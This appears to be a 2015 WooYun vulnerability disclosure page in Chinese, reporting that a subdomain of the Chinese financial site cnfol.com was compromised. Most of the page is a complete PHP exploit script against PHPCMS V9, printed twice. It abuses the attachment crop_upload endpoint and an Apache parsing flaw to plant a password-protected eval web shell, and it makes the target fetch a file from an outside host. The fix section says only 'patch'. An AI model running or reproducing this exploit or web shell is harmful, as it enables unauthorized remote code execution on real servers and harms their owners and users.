当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(3) 关注此漏洞

缺陷编号: WooYun-2015-134593

漏洞标题: 中金在线某站Getshell

相关厂商: 福建中金在线网络股份有限公司

漏洞作者: 路人甲

提交时间: 2015-08-17 09:33

公开时间: 2015-10-01 10:36

漏洞类型: 成功的入侵事件

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

1人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-17: 细节已通知厂商并且等待厂商处理中
2015-08-17: 厂商已经确认,细节仅向厂商公开
2015-08-27: 细节向核心白帽子及相关领域专家公开
2015-09-06: 细节向普通白帽子公开
2015-09-16: 细节向实习白帽子公开
2015-10-01: 细节向公众公开

简要描述:

RT

详细说明:

问题站点:http://tx.cnfol.com



QQ截图20150816235046.jpg





PHPCMS V9 找个exp getshell

code 区域
<?php

error_reporting(E_ERROR);

set_time_limit(0);

$pass="ln";

print_r('

+---------------------------------------------------------------------------+

PHPCms V9 GETSHELL 0DAY



code by L.N.



apache 适用(利用的apache的解析漏洞)

+---------------------------------------------------------------------------+

');

if ($argc < 2) {

print_r('

+---------------------------------------------------------------------------+

Usage: php '.$argv[0].' url path



Example:

1.php '.$argv[0].' lanu.sinaapp.com

2.php '.$argv[0].' lanu.sinaapp.com /phpcms

+---------------------------------------------------------------------------+

');

exit;

}



$url = $argv[1];

$path = $argv[2];

$phpshell = '<?php @eval($_POST[\''.$pass.'\']);?>';

$file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';

if($ret=Create_dir($url,$path))

{

//echo $ret;

$pattern = "|Server:[^,]+?|U";

preg_match_all($pattern, $ret, $matches);

if($matches[0][0])

{

if(strpos($matches[0][0],'Apache') == false)

{

echo "\n亲!此网站不是apache的网站。\n";exit;

}

}

$ret = GetShell($url,$phpshell,$path,$file);

$pattern = "|http:\/\/[^,]+?\.,?|U";

preg_match_all($pattern, $ret, $matches);

if($matches[0][0])

{

echo "\n".'密码为: '.$pass."\n";

echo "\r\nurl地址: ".$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;

}

else

{

$pattern = "|\/uploadfile\/[^,]+?\.,?|U";

preg_match_all($pattern, $ret, $matches);

if($matches[0][0])

{

echo "\n".'密码为: '.$pass."\n";

echo "\r\nurl地址:".'http://'.$url.$path.$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;

}

else

{

echo "\r\n没得到!\n";exit;

}

}

}



function GetShell($url,$shell,$path,$js)

{

$content =$shell;

$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." HTTP/1.1\r\n";

$data .= "Host: ".$url."\r\n";

$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";

$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";

$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";

$data .= "Connection: close\r\n";

$data .= "Content-Length: ".strlen($content)."\r\n\r\n";

$data .= $content."\r\n";

$ock=fsockopen($url,80);

if (!$ock)

{

echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;

}

else

{

fwrite($ock,$data);

$resp = '';

while (!feof($ock))

{

$resp.=fread($ock, 1024);

}

return $resp;

}

}



function Create_dir($url,$path='')

{

$content ='I love you';

$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n";

$data .= "Host: ".$url."\r\n";

$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";

$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";

$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";

$data .= "Connection: close\r\n";

$data .= "Content-Length: ".strlen($content)."\r\n\r\n";

$data .= $content."\r\n";

$ock=fsockopen($url,80);

if (!$ock)

{

echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;

}

fwrite($ock,$data);

$resp = '';

while (!feof($ock))

{

$resp.=fread($ock, 1024);

}

return $resp;

}

?>





QQ截图20150816235523.jpg



QQ截图20150816235545.jpg









漏洞证明:

问题站点:http://tx.cnfol.com



QQ截图20150816235046.jpg





PHPCMS V9 找个exp getshell

code 区域
<?php

error_reporting(E_ERROR);

set_time_limit(0);

$pass="ln";

print_r('

+---------------------------------------------------------------------------+

PHPCms V9 GETSHELL 0DAY



code by L.N.



apache 适用(利用的apache的解析漏洞)

+---------------------------------------------------------------------------+

');

if ($argc < 2) {

print_r('

+---------------------------------------------------------------------------+

Usage: php '.$argv[0].' url path



Example:

1.php '.$argv[0].' lanu.sinaapp.com

2.php '.$argv[0].' lanu.sinaapp.com /phpcms

+---------------------------------------------------------------------------+

');

exit;

}



$url = $argv[1];

$path = $argv[2];

$phpshell = '<?php @eval($_POST[\''.$pass.'\']);?>';

$file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';

if($ret=Create_dir($url,$path))

{

//echo $ret;

$pattern = "|Server:[^,]+?|U";

preg_match_all($pattern, $ret, $matches);

if($matches[0][0])

{

if(strpos($matches[0][0],'Apache') == false)

{

echo "\n亲!此网站不是apache的网站。\n";exit;

}

}

$ret = GetShell($url,$phpshell,$path,$file);

$pattern = "|http:\/\/[^,]+?\.,?|U";

preg_match_all($pattern, $ret, $matches);

if($matches[0][0])

{

echo "\n".'密码为: '.$pass."\n";

echo "\r\nurl地址: ".$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;

}

else

{

$pattern = "|\/uploadfile\/[^,]+?\.,?|U";

preg_match_all($pattern, $ret, $matches);

if($matches[0][0])

{

echo "\n".'密码为: '.$pass."\n";

echo "\r\nurl地址:".'http://'.$url.$path.$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;

}

else

{

echo "\r\n没得到!\n";exit;

}

}

}



function GetShell($url,$shell,$path,$js)

{

$content =$shell;

$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." HTTP/1.1\r\n";

$data .= "Host: ".$url."\r\n";

$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";

$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";

$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";

$data .= "Connection: close\r\n";

$data .= "Content-Length: ".strlen($content)."\r\n\r\n";

$data .= $content."\r\n";

$ock=fsockopen($url,80);

if (!$ock)

{

echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;

}

else

{

fwrite($ock,$data);

$resp = '';

while (!feof($ock))

{

$resp.=fread($ock, 1024);

}

return $resp;

}

}



function Create_dir($url,$path='')

{

$content ='I love you';

$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n";

$data .= "Host: ".$url."\r\n";

$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";

$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";

$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";

$data .= "Connection: close\r\n";

$data .= "Content-Length: ".strlen($content)."\r\n\r\n";

$data .= $content."\r\n";

$ock=fsockopen($url,80);

if (!$ock)

{

echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;

}

fwrite($ock,$data);

$resp = '';

while (!feof($ock))

{

$resp.=fread($ock, 1024);

}

return $resp;

}

?>





QQ截图20150816235523.jpg



QQ截图20150816235545.jpg







修复方案:

补丁

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-17 10:34

厂商回复:

谢谢,我们会立即处理漏洞。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

登录后才能发表评论,请先 登录